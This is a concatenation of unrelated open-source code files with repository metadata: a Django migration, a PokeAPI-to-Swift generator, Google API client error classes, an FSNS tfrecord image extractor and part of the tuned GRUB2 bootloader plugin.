# dc.subsetRegion('sourceFileDownloads/em_hrrr.t00z.wrfsfcf00.grib2', 38.22, 41.22, -87.79, -84.79, 'sourceFileDownloads/sem_hrrr.t00z.wrfsfcf00.grib2')
###############################################################################################
############################### extractMessagesAndSubsetRegion ################################
###############################################################################################
# dc.extractMessagesAndSubsetRegion('sourceFileDownloads/rtma2p5.t00z.2dvaranl_ndfd.grb2', [':DPT:2 m above ground', ':TMP:2 m above ground'], 'temp/', 38.22, 41.22, -87.79, -84.79, 'sourceFileDownloads/sem_rtma2p5.t00z.2dvaranl_ndfd.grb2')
# dc.extractMessagesAndSubsetRegion('sourceFileDownloads/hrrr.t00z.wrfsfcf00.grib2', [':TMP:500 mb', ':WIND:10 m above ground'], 'temp', 38.22, 41.22, -87.79, -84.79, 'sourceFileDownloads/sem_hrrr.t00z.wrfsfcf00.grib2')
| gpl-3.0 | 3,493,325,894,899,479,600 | 54.374233 | 240 | 0.574008 | false |
praekelt/jmbo-downloads | downloads/migrations/0002_rename_imagemod_to_temporarydownload.py | 1 | 13460 | # -*- coding: utf-8 -*-
import datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
# Rename model 'TextOverlayImageMod'
db.rename_table('downloads_textoverlayimagemod', 'downloads_textoverlaytemporarydownload')
# Adding field 'Download.visible'
db.add_column('downloads_download', 'visible',
self.gf('django.db.models.fields.BooleanField')(default=True),
keep_default=False)
def backwards(self, orm):
# Renaming model 'TextOverlayTemporaryDownload'
db.rename_table('downloads_textoverlaytemporarydownload', 'downloads_textoverlayimagemod')
# Removing field 'Download.visible'
db.delete_column('downloads_download', 'visible')
models = {
'auth.group': {
'Meta': {'object_name': 'Group'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '80'}),
'permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'})
},
'auth.permission': {
'Meta': {'ordering': "('content_type__app_label', 'content_type__model', 'codename')", 'unique_together': "(('content_type', 'codename'),)", 'object_name': 'Permission'},
'codename': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['contenttypes.ContentType']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
},
'auth.user': {
'Meta': {'object_name': 'User'},
'date_joined': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'blank': 'True'}),
'first_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'groups': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Group']", 'symmetrical': 'False', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'is_staff': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'is_superuser': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'last_login': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'last_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'password': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'user_permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'}),
'username': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '30'})
},
'category.category': {
'Meta': {'ordering': "('title',)", 'object_name': 'Category'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'parent': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['category.Category']", 'null': 'True', 'blank': 'True'}),
'slug': ('django.db.models.fields.SlugField', [], {'unique': 'True', 'max_length': '255'}),
'title': ('django.db.models.fields.CharField', [], {'max_length': '200'})
},
'category.tag': {
'Meta': {'ordering': "('title',)", 'object_name': 'Tag'},
'categories': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'to': "orm['category.Category']", 'null': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'slug': ('django.db.models.fields.SlugField', [], {'unique': 'True', 'max_length': '255'}),
'title': ('django.db.models.fields.CharField', [], {'max_length': '200'})
},
'contenttypes.contenttype': {
'Meta': {'ordering': "('name',)", 'unique_together': "(('app_label', 'model'),)", 'object_name': 'ContentType', 'db_table': "'django_content_type'"},
'app_label': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'model': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'})
},
'downloads.download': {
'Meta': {'ordering': "['primary_category', 'title']", 'object_name': 'Download', '_ormbases': ['jmbo.ModelBase']},
'file': ('django.db.models.fields.files.FileField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'file_name': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'modelbase_ptr': ('django.db.models.fields.related.OneToOneField', [], {'to': "orm['jmbo.ModelBase']", 'unique': 'True', 'primary_key': 'True'}),
'do_not_list': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'visible': ('django.db.models.fields.BooleanField', [], {'default': 'True'})
},
'downloads.textoverlaytemporarydownload': {
'Meta': {'object_name': 'TextOverlayTemporaryDownload'},
'background_image': ('django.db.models.fields.files.ImageField', [], {'max_length': '100'}),
'colour': ('downloads.fields.ColourField', [], {'max_length': '7'}),
'download_ptr': ('django.db.models.fields.related.OneToOneField', [], {'to': "orm['downloads.Download']", 'unique': 'True', 'primary_key': 'True'}),
'font': ('django.db.models.fields.FilePathField', [], {'path': "'/usr/share/fonts/truetype/'", 'max_length': '100', 'recursive': 'True'}),
'font_size': ('django.db.models.fields.PositiveIntegerField', [], {}),
'height': ('django.db.models.fields.PositiveIntegerField', [], {}),
'text': ('django.db.models.fields.TextField', [], {}),
'unique_per_user': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'width': ('django.db.models.fields.PositiveIntegerField', [], {}),
'x': ('django.db.models.fields.PositiveIntegerField', [], {}),
'y': ('django.db.models.fields.PositiveIntegerField', [], {})
},
'jmbo.modelbase': {
'Meta': {'ordering': "('-created',)", 'object_name': 'ModelBase'},
'anonymous_comments': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'anonymous_likes': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'categories': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'to': "orm['category.Category']", 'null': 'True', 'blank': 'True'}),
'class_name': ('django.db.models.fields.CharField', [], {'max_length': '32', 'null': 'True'}),
'comments_closed': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'comments_enabled': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['contenttypes.ContentType']", 'null': 'True'}),
'created': ('django.db.models.fields.DateTimeField', [], {'blank': 'True'}),
'crop_from': ('django.db.models.fields.CharField', [], {'default': "'center'", 'max_length': '10', 'blank': 'True'}),
'date_taken': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
'description': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'effect': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'modelbase_related'", 'null': 'True', 'to': "orm['photologue.PhotoEffect']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'image': ('django.db.models.fields.files.ImageField', [], {'max_length': '100', 'blank': 'True'}),
'likes_closed': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'likes_enabled': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'modified': ('django.db.models.fields.DateTimeField', [], {}),
'owner': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']", 'null': 'True', 'blank': 'True'}),
'primary_category': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'primary_modelbase_set'", 'null': 'True', 'to': "orm['category.Category']"}),
'publish_on': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
'publishers': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'to': "orm['publisher.Publisher']", 'null': 'True', 'blank': 'True'}),
'retract_on': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
'sites': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'to': "orm['sites.Site']", 'null': 'True', 'blank': 'True'}),
'slug': ('django.db.models.fields.SlugField', [], {'unique': 'True', 'max_length': '255'}),
'state': ('django.db.models.fields.CharField', [], {'default': "'unpublished'", 'max_length': '32', 'null': 'True', 'blank': 'True'}),
'subtitle': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '200', 'null': 'True', 'blank': 'True'}),
'tags': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'to': "orm['category.Tag']", 'null': 'True', 'blank': 'True'}),
'title': ('django.db.models.fields.CharField', [], {'max_length': '200'}),
'view_count': ('django.db.models.fields.PositiveIntegerField', [], {'default': '0'})
},
'photologue.photoeffect': {
'Meta': {'object_name': 'PhotoEffect'},
'background_color': ('django.db.models.fields.CharField', [], {'default': "'#FFFFFF'", 'max_length': '7'}),
'brightness': ('django.db.models.fields.FloatField', [], {'default': '1.0'}),
'color': ('django.db.models.fields.FloatField', [], {'default': '1.0'}),
'contrast': ('django.db.models.fields.FloatField', [], {'default': '1.0'}),
'description': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'filters': ('django.db.models.fields.CharField', [], {'max_length': '200', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '30'}),
'reflection_size': ('django.db.models.fields.FloatField', [], {'default': '0'}),
'reflection_strength': ('django.db.models.fields.FloatField', [], {'default': '0.6'}),
'sharpness': ('django.db.models.fields.FloatField', [], {'default': '1.0'}),
'transpose_method': ('django.db.models.fields.CharField', [], {'max_length': '15', 'blank': 'True'})
},
'publisher.publisher': {
'Meta': {'object_name': 'Publisher'},
'class_name': ('django.db.models.fields.CharField', [], {'max_length': '32', 'null': 'True'}),
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['contenttypes.ContentType']", 'null': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'title': ('django.db.models.fields.CharField', [], {'max_length': '64'})
},
'secretballot.vote': {
'Meta': {'unique_together': "(('token', 'content_type', 'object_id'),)", 'object_name': 'Vote'},
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['contenttypes.ContentType']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'object_id': ('django.db.models.fields.PositiveIntegerField', [], {}),
'token': ('django.db.models.fields.CharField', [], {'max_length': '50'}),
'vote': ('django.db.models.fields.SmallIntegerField', [], {})
},
'sites.site': {
'Meta': {'ordering': "('domain',)", 'object_name': 'Site', 'db_table': "'django_site'"},
'domain': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
}
}
complete_apps = ['downloads'] | bsd-3-clause | -4,211,806,556,319,506,000 | 77.719298 | 195 | 0.556464 | false |
dgollub/pokealmanac | scripts/parse_pokeapi.py | 1 | 12145 | #!/usr/bin/env python
# encoding: utf-8
"""
Copyright (c) 2016 by Daniel Kurashige-Gollub <[email protected]>
License MIT: see LICENSE file.
"""
"""
Download the API documentation for the PokeAPI.co site, parse it and
generate Swift structs/classes from it that allow us to easily
use the API in an iOS project.
WARNING: produces un-compilable code and wrong code at the moment.
This is due to the following:
- this code is not optimized/bug free
- the actual API documentation on the PokeAPI.co site has actual errors,
like listing the wrong data type
- the actual API documentation seems to have duplicate "Version"
definitions for the Version endpoint
- need a way to add custom method to the result struct that resolves
NamedAPIResourceList types into a list of the real type
- the PokeAPI documentation lacks information about optional results
i. e. results that can be empty/null
TODO(dkg): also generate SQL statements and Swift methods that allow us
to easily save and load the data gathered from the API on the device
in a SQLite database file.
"""
import os
import codecs
# import shutil
import sys
import traceback
# fix stdout utf-8 decoding/encoding errors
reload(sys)
sys.setdefaultencoding('utf-8')
sys.stdout = codecs.getwriter('utf8')(sys.stdout)
CURRENT_PATH = os.path.dirname(os.path.abspath(__file__))
API_URL = "http://pokeapi.co/docsv2/"
if sys.version_info.major != 2 or sys.version_info.minor != 7:
    print "This script was developed with Python 2.7.x and there is no guarantee that it will work with another version."
    print "Please comment out this version check if you want to give it a try."
sys.exit(1)
try:
from bs4 import BeautifulSoup
except ImportError:
print "Please install the Python library BeautifulSoup4 first."
sys.exit(1)
try:
import lxml
except ImportError:
print "Please install the Python lxml library first."
sys.exit(1)
try:
import requests
except ImportError:
print "Please install the Python requests library first."
sys.exit(1)
def download_api_page():
    print "Downloading API documentation from %s" % API_URL
r = requests.get(API_URL)
if r.status_code != 200:
raise Exception("Could not download the Pokemon API site. Please check. Reason: %s" % (str(r.raw.read())))
print "Ok"
return unicode(r.text)
def parse_endpoint(soup, endpoint_id, already_done):
# special cases
# version ==> id is "versions"
if endpoint_id == "version":
endpoint_id = "versions"
header = soup.find("h2", id=endpoint_id)
if header is None:
print "Could not find header for endpoint '%s'!!!" % (endpoint_id)
return (None, False)
model_header = header.find_next_sibling("h4")
# TODO(dkg): example, url and desc are completely wrong at the moment - fix this!
desc_element = header.find_next_sibling("p")
if desc_element is None:
print "No description for %s" % (endpoint_id)
desc = ""
else:
desc = desc_element.text # NOTE(dkg): text loses all inner HTML elements though ... hmmm.
url_element = header.find_next_sibling("h3")
url = url_element.text if url_element is not None else ""
# example_element = header.find_next_sibling("pre")
example = ""
example_element = header.find_previous_sibling("pre")
if example_element is not None:
example_sib = example_element.find_next_sibling("h4")
if example_sib.text == model_header.text:
example = example_element.text if example_element is not None else ""
# print endpoint_id, header
# print desc
# print url
# print example
code = """
//
// %(category)s - %(name)s
// %(url)s
// %(desc)s
//
%(example)s
//
//
public class %(name)s : JSONJoy {
%(variables)s
public required init(_ decoder: JSONDecoder) throws {
%(trycatches)s
}
}"""
# TODO(dkg): what about optional variables????
variable = "public let %(name)s: %(type)s // %(comment)s"
decoder_array = """
guard let tmp%(tmpName)s = decoder["%(name)s"].array else { throw JSONError.WrongType }
var collect%(tmpName)s = [%(type)s]()
for tmpDecoder in tmp%(tmpName)s {
collect%(tmpName)s.append(try %(type)s(tmpDecoder))
}
%(name)s = collect%(tmpName)s
"""
decoder_type = """%(name)s = try %(type)s(decoder["%(name)s"])"""
decoder_var = """%(name)s = try decoder["%(name)s"].%(type)s"""
result = []
# raise Exception("Test")
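    # walk every response model of this endpoint (an h4 heading followed by a field table)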
while model_header is not None and model_header.text not in already_done:
model_table = model_header.find_next_sibling("table")
# print model_header
# print model_table
mt_body = model_table.find("tbody")
mt_rows = mt_body.find_all("tr")
variables = []
trycatches = []
for mt_row in mt_rows:
# print mt_row
columns = mt_row.find_all("td")
varname = columns[0].text
vardesc = columns[1].text
vartype = columns[-1].text
if vartype in ["integer", "string", "boolean"]:
typevar = "Int" if vartype == "integer" else "String" if vartype == "string" else "Bool"
varout = variable % {
"name": varname,
"type": typevar,
"comment": vardesc
}
decodetype = "getInt()" if vartype == "integer" else "getString()" if vartype == "string" else "bool"
decoderout = decoder_var % {
"name": varname,
"type": decodetype
}
elif "list" in vartype:
# example: list <a href="#berryflavormap">BerryFlavorMap</a>
if "integer" in vartype:
typename = "[Int]"
elif "string" in vartype:
typename = "[String]"
else:
anchors = columns[-1].find_all("a")
typename = anchors[-1].text if len(anchors) > 0 else "????"
if len(anchors) == 0:
raise Exception("What is this? %s %s" % (varname, model_header.text))
varout = variable % {
"name": varname,
"type": u"[%s]" % (typename),
"comment": vardesc
}
decoderout = decoder_array % {
"name": varname,
"type": typename,
"tmpName": varname.capitalize(),
}
elif "NamedAPIResource" in vartype:
                # TODO(dkg): Need to add an additional method that converts the NamedAPIResource URL to its correct type.
# Example: BerryFirmness here points to a URL, instead of the full JSON for BerryFirmness.
# The struct therefore should provide a method that either returns the cached data or nil
# if no cached data is available. (What about if the actual API didn't provide any data?)
# example: <a href="#namedapiresource">NamedAPIResource</a> (<a href="#berry-firmnesses">BerryFirmness</a>)
typename = columns[-1].find_all("a")[-1].text
varout = variable % {
"name": varname,
"type": typename,
"comment": vardesc
}
decoderout = decoder_type % {
"name": varname,
"type": typename
}
else:
# TODO(dkg): this case emits some wrong code for certain cases - need to fix this
# Just handle this type as its own datatype
varout = variable % {
"name": varname,
"type": vartype,
"comment": vardesc
}
decoderout = decoder_var % {
"name": varname,
"type": vartype
}
# raise Exception("Variable '%s' datatype not handled: %s" % (varname, vartype))
variables.append(varout)
trycatches.append(decoderout)
# print varname, vardesc, vartype, varout
# return
tmp = code % {
"category": header.text,
"name": model_header.text.replace(" ", ""),
"desc": desc,
"url": url,
"example": u"\n".join(map(lambda line: u"// %s" % line, example.split("\n"))),
"variables": (u"\n%s" % (u" " * 4)).join(variables),
"trycatches": (u"\n%s" % (u" " * 8)).join(trycatches),
}
result.append(tmp)
already_done.append(model_header.text)
# get the next response model
model_header = model_header.find_next_sibling("h4")
# print "next model_header", model_header
# check if the next header belongs to a different endpoint
if model_header is not None and endpoint_id not in ["common-models", "resource-lists"]:
parent_header = model_header.find_previous_sibling("h2")
# print 'parent_header["id"]', endpoint_id, parent_header["id"]
if endpoint_id != parent_header["id"][1:]:
model_header = None
return ("\n".join(result), True)
def parse_api(api_data):
print "Gonna parse the data now ..."
soup = BeautifulSoup(api_data, "lxml")
# head_element = soup.find(id="pokeapi-v2-api-reference")
# nav_table = head_element.find_next_sibling("table")
# lists = nav_table.find_all("ul")
div = soup.find("div", class_="doc-select")
lists = filter(lambda l: len(l.attrs.keys()) == 0, div.find_all("li"))
api_endpoint_ids = []
for l in lists:
endpoint_id = l.a["href"]
if endpoint_id in ["#wrap", "#info"]:
continue
api_endpoint_ids.append(endpoint_id)
print api_endpoint_ids
already_done = []
result = []
for endpoint in api_endpoint_ids:
parsed_data, found = parse_endpoint(soup, endpoint[1:], already_done) # remove # char from the id
if found:
result.append(parsed_data)
return "\n".join(result)
def main():
print "Go!"
folder = os.path.join(CURRENT_PATH, "pokeapi.co")
if not os.path.exists(folder):
os.makedirs(folder)
api_file_name = os.path.join(folder, "api.html")
download_api = True
ask = "dontask" not in sys.argv
if os.path.exists(api_file_name):
if ask:
user_input = (raw_input("A local copy of the API site exists already. Do you want to download it anyway and overwrite the local copy? yes/[no]: ") or "").strip().lower()[:1]
download_api = user_input in ["y", "j"]
else:
download_api = False
if download_api:
api_site_data = download_api_page()
with codecs.open(api_file_name, "w", "utf-8") as f:
f.write(api_site_data)
else:
with codecs.open(api_file_name, "r", "utf-8") as f:
api_site_data = f.read()
parsed_api = parse_api(api_site_data)
if len(parsed_api) > 0:
# print parsed_api # TODO(dkg): write to a file
output_file = os.path.join(folder, "pokeapi-generated.swift")
with codecs.open(output_file, "w", "utf-8") as f:
f.write("//\n// This file was generated by a Python script.\n// DO NOT USE THIS CODE DIRECTLY! IT DOES NOT COMPILE!\n//\n\n")
f.write("//\n// There are documentation errors in the API, so some types are wrong.\n// Double check everything before ")
f.write("using any of this generated code.\n// DO NOT USE THIS CODE DIRECTLY! IT DOES NOT COMPILE!\n//\n\n")
f.write(parsed_api)
f.write("\n")
print "Wrote %s" % (output_file)
print "Done."
try:
main()
except Exception as ex:
print "Something went wrong. Oops."
print ex
traceback.print_exc(file=sys.stdout)
| mit | 4,508,636,457,054,790,700 | 36.140673 | 185 | 0.573322 | false |
kartikluke/yotube | googleapiclient/errors.py | 1 | 3516 | #!/usr/bin/python2.4
#
# Copyright (C) 2014 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Errors for the library.
All exceptions defined by the library
should be defined in this file.
"""
__author__ = '[email protected] (Joe Gregorio)'
from oauth2client import util
from oauth2client.anyjson import simplejson
class Error(Exception):
"""Base error for this module."""
pass
class HttpError(Error):
"""HTTP data was invalid or unexpected."""
@util.positional(3)
def __init__(self, resp, content, uri=None):
self.resp = resp
self.content = content
self.uri = uri
def _get_reason(self):
"""Calculate the reason for the error from the response content."""
reason = self.resp.reason
try:
data = simplejson.loads(self.content)
reason = data['error']['message']
except (ValueError, KeyError):
pass
if reason is None:
reason = ''
return reason
def __repr__(self):
if self.uri:
return '<HttpError %s when requesting %s returned "%s">' % (
self.resp.status, self.uri, self._get_reason().strip())
else:
return '<HttpError %s "%s">' % (self.resp.status, self._get_reason())
__str__ = __repr__
class InvalidJsonError(Error):
"""The JSON returned could not be parsed."""
pass
class UnknownFileType(Error):
"""File type unknown or unexpected."""
pass
class UnknownLinkType(Error):
"""Link type unknown or unexpected."""
pass
class UnknownApiNameOrVersion(Error):
"""No API with that name and version exists."""
pass
class UnacceptableMimeTypeError(Error):
"""That is an unacceptable mimetype for this operation."""
pass
class MediaUploadSizeError(Error):
"""Media is larger than the method can accept."""
pass
class ResumableUploadError(HttpError):
  """Error occurred during resumable upload."""
pass
class InvalidChunkSizeError(Error):
"""The given chunksize is not valid."""
pass
class InvalidNotificationError(Error):
"""The channel Notification is invalid."""
pass
class BatchError(HttpError):
  """Error occurred during batch operations."""
@util.positional(2)
def __init__(self, reason, resp=None, content=None):
self.resp = resp
self.content = content
self.reason = reason
def __repr__(self):
return '<BatchError %s "%s">' % (self.resp.status, self.reason)
__str__ = __repr__
class UnexpectedMethodError(Error):
"""Exception raised by RequestMockBuilder on unexpected calls."""
@util.positional(1)
def __init__(self, methodId=None):
"""Constructor for an UnexpectedMethodError."""
super(UnexpectedMethodError, self).__init__(
'Received unexpected call %s' % methodId)
class UnexpectedBodyError(Error):
"""Exception raised by RequestMockBuilder on unexpected bodies."""
def __init__(self, expected, provided):
"""Constructor for an UnexpectedMethodError."""
super(UnexpectedBodyError, self).__init__(
'Expected: [%s] - Provided: [%s]' % (expected, provided))
| mit | -440,186,985,566,424,600 | 24.114286 | 75 | 0.685438 | false |
Bartzi/stn-ocr | datasets/fsns/tfrecord_utils/tfrecord_to_image.py | 1 | 2073 | import argparse
import csv
import os
import re
import numpy as np
import tensorflow as tf
from PIL import Image
FILENAME_PATTERN = re.compile(r'.+-(\d+)-of-(\d+)')
if __name__ == "__main__":
parser = argparse.ArgumentParser(description='tool that takes tfrecord files and extracts all images + labels from it')
parser.add_argument('tfrecord_dir', help='path to directory containing tfrecord files')
parser.add_argument('destination_dir', help='path to dir where resulting images shall be saved')
parser.add_argument('stage', help='stage of training these files are for [e.g. train]')
args = parser.parse_args()
tfrecord_files = os.listdir(args.tfrecord_dir)
tfrecord_files = sorted(tfrecord_files, key=lambda x: int(FILENAME_PATTERN.match(x).group(1)))
with open(os.path.join(args.destination_dir, '{}.csv'.format(args.stage)), 'w') as label_file:
writer = csv.writer(label_file, delimiter='\t')
for tfrecord_file in tfrecord_files:
tfrecord_filename = os.path.join(args.tfrecord_dir, tfrecord_file)
file_id = FILENAME_PATTERN.match(tfrecord_file).group(1)
dest_dir = os.path.join(args.destination_dir, args.stage, file_id)
os.makedirs(dest_dir, exist_ok=True)
record_iterator = tf.python_io.tf_record_iterator(path=tfrecord_filename)
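            # each record is a serialized tf.train.Example holding the label ids ('image/class')
            # and the PNG-encoded image bytes ('image/encoded')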
for idx, string_record in enumerate(record_iterator):
example = tf.train.Example()
example.ParseFromString(string_record)
labels = example.features.feature['image/class'].int64_list.value
img_string = example.features.feature['image/encoded'].bytes_list.value[0]
file_name = os.path.join(dest_dir, '{}.png'.format(idx))
with open(file_name, 'wb') as f:
f.write(img_string)
label_file_data = [file_name]
label_file_data.extend(labels)
writer.writerow(label_file_data)
print("recovered {:0>6} files".format(idx), end='\r')
| gpl-3.0 | -3,318,274,954,810,785,300 | 38.113208 | 123 | 0.636276 | false |
olysonek/tuned | tuned/plugins/plugin_bootloader.py | 1 | 12902 | from . import base
from .decorators import *
import tuned.logs
from . import exceptions
from tuned.utils.commands import commands
import tuned.consts as consts
import os
import re
import tempfile
log = tuned.logs.get()
class BootloaderPlugin(base.Plugin):
"""
Plugin for tuning bootloader options.
Currently only grub2 is supported and reboot is required to apply the tunings.
These tunings are unloaded only on profile change followed by reboot.
"""
def __init__(self, *args, **kwargs):
if not os.path.isfile(consts.GRUB2_TUNED_TEMPLATE_PATH):
raise exceptions.NotSupportedPluginException("Required GRUB2 template not found, disabling plugin.")
super(BootloaderPlugin, self).__init__(*args, **kwargs)
self._cmd = commands()
def _instance_init(self, instance):
instance._has_dynamic_tuning = False
instance._has_static_tuning = True
# controls grub2_cfg rewrites in _instance_post_static
self.update_grub2_cfg = False
self._initrd_remove_dir = False
self._initrd_dst_img_val = None
self._cmdline_val = ""
self._initrd_val = ""
self._grub2_cfg_file_names = self._get_grub2_cfg_files()
def _instance_cleanup(self, instance):
pass
@classmethod
def _get_config_options(cls):
return {
"grub2_cfg_file": None,
"initrd_dst_img": None,
"initrd_add_img": None,
"initrd_add_dir": None,
"initrd_remove_dir": None,
"cmdline": None,
}
def _get_effective_options(self, options):
"""Merge provided options with plugin default options and merge all cmdline.* options."""
effective = self._get_config_options().copy()
cmdline_keys = []
for key in options:
if str(key).startswith("cmdline"):
cmdline_keys.append(key)
elif key in effective:
effective[key] = options[key]
else:
log.warn("Unknown option '%s' for plugin '%s'." % (key, self.__class__.__name__))
cmdline_keys.sort()
cmdline = ""
for key in cmdline_keys:
val = options[key]
if val is None or val == "":
continue
op = val[0]
vals = val[1:].strip()
if op == "+" and vals != "":
cmdline += " " + vals
elif op == "-" and vals != "":
for p in vals.split():
regex = re.escape(p)
cmdline = re.sub(r"(\A|\s)" + regex + r"(?=\Z|\s)", r"", cmdline)
else:
cmdline += " " + val
cmdline = cmdline.strip()
if cmdline != "":
effective["cmdline"] = cmdline
return effective
def _get_grub2_cfg_files(self):
cfg_files = []
for f in consts.GRUB2_CFG_FILES:
if os.path.exists(f):
cfg_files.append(f)
return cfg_files
def _patch_bootcmdline(self, d):
return self._cmd.add_modify_option_in_file(consts.BOOT_CMDLINE_FILE, d)
def _remove_grub2_tuning(self):
if not self._grub2_cfg_file_names:
log.info("cannot find grub.cfg to patch")
return
self._patch_bootcmdline({consts.BOOT_CMDLINE_TUNED_VAR : "", consts.BOOT_CMDLINE_INITRD_ADD_VAR : ""})
for f in self._grub2_cfg_file_names:
self._cmd.add_modify_option_in_file(f, {"set\s+" + consts.GRUB2_TUNED_VAR : "", "set\s+" + consts.GRUB2_TUNED_INITRD_VAR : ""}, add = False)
if self._initrd_dst_img_val is not None:
log.info("removing initrd image '%s'" % self._initrd_dst_img_val)
self._cmd.unlink(self._initrd_dst_img_val)
def _instance_unapply_static(self, instance, full_rollback = False):
if full_rollback:
log.info("removing grub2 tuning previously added by Tuned")
self._remove_grub2_tuning()
self._update_grubenv({"tuned_params" : "", "tuned_initrd" : ""})
def _grub2_cfg_unpatch(self, grub2_cfg):
log.debug("unpatching grub.cfg")
cfg = re.sub(r"^\s*set\s+" + consts.GRUB2_TUNED_VAR + "\s*=.*\n", "", grub2_cfg, flags = re.MULTILINE)
grub2_cfg = re.sub(r" *\$" + consts.GRUB2_TUNED_VAR, "", cfg, flags = re.MULTILINE)
cfg = re.sub(r"^\s*set\s+" + consts.GRUB2_TUNED_INITRD_VAR + "\s*=.*\n", "", grub2_cfg, flags = re.MULTILINE)
grub2_cfg = re.sub(r" *\$" + consts.GRUB2_TUNED_INITRD_VAR, "", cfg, flags = re.MULTILINE)
cfg = re.sub(consts.GRUB2_TEMPLATE_HEADER_BEGIN + r"\n", "", grub2_cfg, flags = re.MULTILINE)
return re.sub(consts.GRUB2_TEMPLATE_HEADER_END + r"\n+", "", cfg, flags = re.MULTILINE)
def _grub2_cfg_patch_initial(self, grub2_cfg, d):
log.debug("initial patching of grub.cfg")
s = r"\1\n\n" + consts.GRUB2_TEMPLATE_HEADER_BEGIN + "\n"
for opt in d:
s += r"set " + self._cmd.escape(opt) + "=\"" + self._cmd.escape(d[opt]) + "\"\n"
s += consts.GRUB2_TEMPLATE_HEADER_END + r"\n"
grub2_cfg = re.sub(r"^(\s*###\s+END\s+[^#]+/00_header\s+### *)\n", s, grub2_cfg, flags = re.MULTILINE)
d2 = {"linux" : consts.GRUB2_TUNED_VAR, "initrd" : consts.GRUB2_TUNED_INITRD_VAR}
for i in d2:
# add tuned parameters to all kernels
grub2_cfg = re.sub(r"^(\s*" + i + r"(16|efi)?\s+.*)$", r"\1 $" + d2[i], grub2_cfg, flags = re.MULTILINE)
# remove tuned parameters from rescue kernels
grub2_cfg = re.sub(r"^(\s*" + i + r"(?:16|efi)?\s+\S+rescue.*)\$" + d2[i] + r" *(.*)$", r"\1\2", grub2_cfg, flags = re.MULTILINE)
# fix whitespaces in rescue kernels
grub2_cfg = re.sub(r"^(\s*" + i + r"(?:16|efi)?\s+\S+rescue.*) +$", r"\1", grub2_cfg, flags = re.MULTILINE)
